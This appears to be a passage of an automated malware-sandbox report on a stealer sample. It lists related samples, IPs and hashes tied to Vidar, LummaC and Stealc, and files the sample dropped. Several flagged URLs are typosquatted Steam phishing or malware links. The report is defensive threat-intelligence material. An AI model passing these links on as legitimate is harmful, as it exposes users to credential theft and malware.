                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    92.122.104.90file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          http://sneamcomnnumnlty.com/fact/actual/getGet hashmaliciousUnknownBrowse
                                                                                                                                                            https://u.to/xjPiIAGet hashmaliciousUnknownBrowse
                                                                                                                                                              https://sueamcoommunnlty.com/geting/activeGet hashmaliciousUnknownBrowse
                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                  AD3SI7tuzs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    http://steamcommuninty.com/playtestinvite/deadlockGet hashmaliciousUnknownBrowse
                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        95.217.220.103b157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              7ZthFNAqYp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                M8PoiLFYWM.exeGet hashmaliciousVidarBrowse
Match | Associated Sample Name / URL | Detection | Threat Name | Context
steamcommunity.com | b157p9L0c1.exe | malicious | Vidar | 104.102.49.254
steamcommunity.com | PFlJLzFUqH.exe | malicious | Vidar | 104.102.49.254
steamcommunity.com | 46QSz6qyKC.exe | malicious | Vidar | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC | 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASUS | b157p9L0c1.exe | malicious | Vidar | 104.102.49.254
AKAMAI-ASUS | PFlJLzFUqH.exe | malicious | Vidar | 104.102.49.254
AKAMAI-ASUS | 46QSz6qyKC.exe | malicious | Vidar | 104.102.49.254
AKAMAI-ASUS | file.exe | malicious | LummaC | 104.102.49.254
AKAMAI-ASUS | roquette October.pdf | malicious | HTMLPhisher | 184.28.88.176
AKAMAI-ASUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.102.49.254
AKAMAI-ASUS | phish_alert_sp2_2.0.0.0 - 2024-10-23T084901.360.eml | malicious | HTMLPhisher | 2.19.126.160
AKAMAI-ASUS | file.exe | malicious | LummaC | 104.102.49.254
AKAMAI-ASUS | 9wmt6bpcHr.elf | malicious | Okiru | 104.91.53.81
AKAMAI-ASUS | https://wetransfer.com/downloads/21820466a51be0cc0de4ef5fd28415d320241023112541/61ecbec42424c68f99ca983cd530758a20241023112545/5d3030?t_exp=1729941941&t_lsid=761fb8c4-59e5-4423-a2fe-24d132de0406&t_network=email&t_rid=YXV0aDB8NjcxMjZmN2QzOGFjMDNkYThkOGJmMDM3&t_s=download_link&t_ts=1729682745&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01 | malicious | Unknown | 184.28.89.220
HETZNER-ASDE | b157p9L0c1.exe | malicious | Vidar | 95.217.220.103
HETZNER-ASDE | PFlJLzFUqH.exe | malicious | Vidar | 95.217.220.103
HETZNER-ASDE | 46QSz6qyKC.exe | malicious | Vidar | 95.217.220.103
HETZNER-ASDE | 3cb770h94r.elf | malicious | Okiru | 128.140.114.211
HETZNER-ASDE | la.bot.m68k.elf | malicious | Unknown | 88.198.204.226
HETZNER-ASDE | 7ZthFNAqYp.exe | malicious | Vidar | 95.217.220.103
HETZNER-ASDE | https://zupimages.net/up/24/42/ol13.jpg?d6mSMvU0ZvpGwffnuqPHYMR7NvlxIzVjDfTD4YJjdRSCOcc | malicious | Unknown | 46.4.139.58
HETZNER-ASDE | M8PoiLFYWM.exe | malicious | Vidar | 95.217.220.103
HETZNER-ASDE | la.bot.mips.elf | malicious | Unknown | 144.77.54.232
HETZNER-ASDE | bin.i686.elf | malicious | Gafgyt, Mirai | 144.78.138.87
Match | Associated Sample Name / URL | Detection | Threat Name | Context
51c64c77e60f3980eea90869b68c58a8 | b157p9L0c1.exe | malicious | Vidar | 95.217.220.103
51c64c77e60f3980eea90869b68c58a8 | PFlJLzFUqH.exe | malicious | Vidar | 95.217.220.103
51c64c77e60f3980eea90869b68c58a8 | 46QSz6qyKC.exe | malicious | Vidar | 95.217.220.103
51c64c77e60f3980eea90869b68c58a8 | 7ZthFNAqYp.exe | malicious | Vidar | 95.217.220.103
51c64c77e60f3980eea90869b68c58a8 | M8PoiLFYWM.exe | malicious | Vidar | 95.217.220.103
51c64c77e60f3980eea90869b68c58a8 | Unlock_Tool_2.3.1.exe | malicious | Vidar | 95.217.220.103
51c64c77e60f3980eea90869b68c58a8 | aZm1EZ2IYr.exe | malicious | Vidar | 95.217.220.103
51c64c77e60f3980eea90869b68c58a8 | Unlock_Tool_2.4.exe | malicious | Vidar | 95.217.220.103
51c64c77e60f3980eea90869b68c58a8 | yAkRyU2LPe.exe | malicious | Vidar | 95.217.220.103
51c64c77e60f3980eea90869b68c58a8 | y45bCpZY1I.exe | malicious | Vidar | 95.217.220.103
37f463bf4616ecd445d4a1937da06e19 | b157p9L0c1.exe | malicious | Vidar | 92.122.104.90
37f463bf4616ecd445d4a1937da06e19 | PFlJLzFUqH.exe | malicious | Vidar | 92.122.104.90
37f463bf4616ecd445d4a1937da06e19 | 46QSz6qyKC.exe | malicious | Vidar | 92.122.104.90
37f463bf4616ecd445d4a1937da06e19 | rMactation.exe | malicious | GuLoader | 92.122.104.90
37f463bf4616ecd445d4a1937da06e19 | rMactation.exe | malicious | FormBook, GuLoader | 92.122.104.90
37f463bf4616ecd445d4a1937da06e19 | X2lvDxMUmn.exe | malicious | Stealc, Vidar | 92.122.104.90
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.RATX-gen.30247.31729.exe | malicious | CobaltStrike | 92.122.104.90
37f463bf4616ecd445d4a1937da06e19 | PAGO_____________________________________________________________________________9300179528.exe | malicious | GuLoader | 92.122.104.90
37f463bf4616ecd445d4a1937da06e19 | vkkTIT6kcx.exe | malicious | Stealc, Vidar | 92.122.104.90
37f463bf4616ecd445d4a1937da06e19 | 7ZthFNAqYp.exe | malicious | Vidar | 92.122.104.90
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\ProgramData\freebl3.dll | b157p9L0c1.exe | malicious | Vidar |
C:\ProgramData\freebl3.dll | PFlJLzFUqH.exe | malicious | Vidar |
C:\ProgramData\freebl3.dll | 46QSz6qyKC.exe | malicious | Vidar |
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar |
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar |
C:\ProgramData\freebl3.dll | X2lvDxMUmn.exe | malicious | Stealc, Vidar |
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar |
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar |
C:\ProgramData\freebl3.dll | vkkTIT6kcx.exe | malicious | Stealc, Vidar |
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar |
C:\ProgramData\mozglue.dll | b157p9L0c1.exe | malicious | Vidar |
C:\ProgramData\mozglue.dll | PFlJLzFUqH.exe | malicious | Vidar |
C:\ProgramData\mozglue.dll | 46QSz6qyKC.exe | malicious | Vidar |
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar |
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar |
C:\ProgramData\mozglue.dll | X2lvDxMUmn.exe | malicious | Stealc, Vidar |
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar |
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar |
C:\ProgramData\mozglue.dll | vkkTIT6kcx.exe | malicious | Stealc, Vidar |
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar |
Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Reputation:high, very likely benign file
Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):9571
                                                                                                                                                                                                                          Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                          MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                          SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                          SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                          SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                                          Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                          MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                          SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                          SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                          SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                          Entropy (8bit):0.6550849711192669
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:E4SXFr81BbcosJhozxTMjh6tQXIDcQvc6QcEVcw3cE/P+HbHg/5hZAX/d5FMT2Sw:Eyzbco/80BU/IjhzuiFwZ24IO8Keb
                                                                                                                                                                                                                          MD5:258E64770C64E390DCF325092A6B5B14
                                                                                                                                                                                                                          SHA1:8802ED62CDA01E0C3D6FC6F5B096C3A509B1D7A5
                                                                                                                                                                                                                          SHA-256:ECD989EA3009C8DABC7336020FEA8A1209A7340146B5EA7A692D1BDF02DA4932
                                                                                                                                                                                                                          SHA-512:6A75910B8F9CEA4400361CAE77F67246D4277BC32916B2652F37C47C6EDA92BF90FFDA855B8372015AEC363DF5798EEA5929D98C4C2091E9E31EA14E1FC66F85
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.1.6.9.5.0.1.3.3.4.3.4.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.1.6.9.5.0.1.7.2.4.9.6.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.e.a.4.d.c.4.-.e.5.d.d.-.4.9.d.1.-.9.1.d.d.-.0.c.0.c.0.5.5.1.9.8.f.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.c.c.9.5.5.5.-.8.a.6.6.-.4.9.7.1.-.a.d.d.d.-.5.d.6.9.5.e.2.1.9.7.5.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.M.r.F.w.H.y.j.U.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.e.c.-.0.0.0.1.-.0.0.1.4.-.e.8.5.6.-.a.a.e.d.5.c.2.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.3.e.4.4.c.8.9.c.9.c.4.5.3.e.b.f.f.9.1.5.8.c.4.9.1.f.9.f.a.2.0.0.0.0.0.f.f.f.f.!.0.0.0.0.5.2.3.0.f.e.a.7.4.e.8.c.4.d.e.d.d.a.5.9.c.b.c.d.d.1.3.a.9.b.c.7.a.d.0.3.5.a.c.0.!.U.M.r.F.w.H.y.j.U.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Wed Oct 23 15:05:01 2024, 0x1205a4 type
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):39598
                                                                                                                                                                                                                          Entropy (8bit):1.7463289539338198
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:jsrCVdWhjcOS8cikHb1rvUKtH4kx4cIyovwcPo:pVYTWik71rvUQH4rcIy2
                                                                                                                                                                                                                          MD5:CFE44BCECD79D23E93C6E636A085E1E5
                                                                                                                                                                                                                          SHA1:2FC12162573F15A4ED5186192C6A3B39790A2A96
                                                                                                                                                                                                                          SHA-256:9A7834D93720AA93B0D6FE3D26923EDE09103C786D8581CD7372F4B7EFF40737
                                                                                                                                                                                                                          SHA-512:338F4895C53F31CBACAF28EF89318250C40F8D4AEE842B23B02C34D01E9CEB745BFDF50FDD0E8C6D908FA1C29967837E70E476973C093744E34061BD5ED807F5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):8380
                                                                                                                                                                                                                          Entropy (8bit):3.6949730146202886
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJMakK6l6Y9RSU9ingmfO4QTQeh3prRG89bGqsffim:R6lXJM86l6YLSU9ingmfO4QxPGJfb
                                                                                                                                                                                                                          MD5:2EB52E3EF5A9523759D771B94F7CF25F
                                                                                                                                                                                                                          SHA1:DD942E4DDB2A61E48386A36453D4E1E3E41271C3
                                                                                                                                                                                                                          SHA-256:7B7E1F0849929DB1891EF40B81D693428CB91115D1DA7D67DF4DF00F7C7A61AB
                                                                                                                                                                                                                          SHA-512:BABC19060C3232C8FD62931BBD4A58CDA9B4B060B3E8B80624AF388CDC9588AE1573D44A4FBA09CFECE821E49C4FB9A1B92C0BEBF0D5E1358ACA175671CCB5F3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.0.4.<./.P.i.
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4696
                                                                                                                                                                                                                          Entropy (8bit):4.473553621479366
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsJJg77aI9+JyvSWpW8VYPYm8M4JFLUFgf+q8vSLO1IvaCDwMdd:uIjfbI7QJyvz7VrJpfK91gaCLdd
                                                                                                                                                                                                                          MD5:8BC546445D22F86EA0194BE38C26D2B5
                                                                                                                                                                                                                          SHA1:599560E6C6345EF2655C99EF2E5DC2E53B4E0B9F
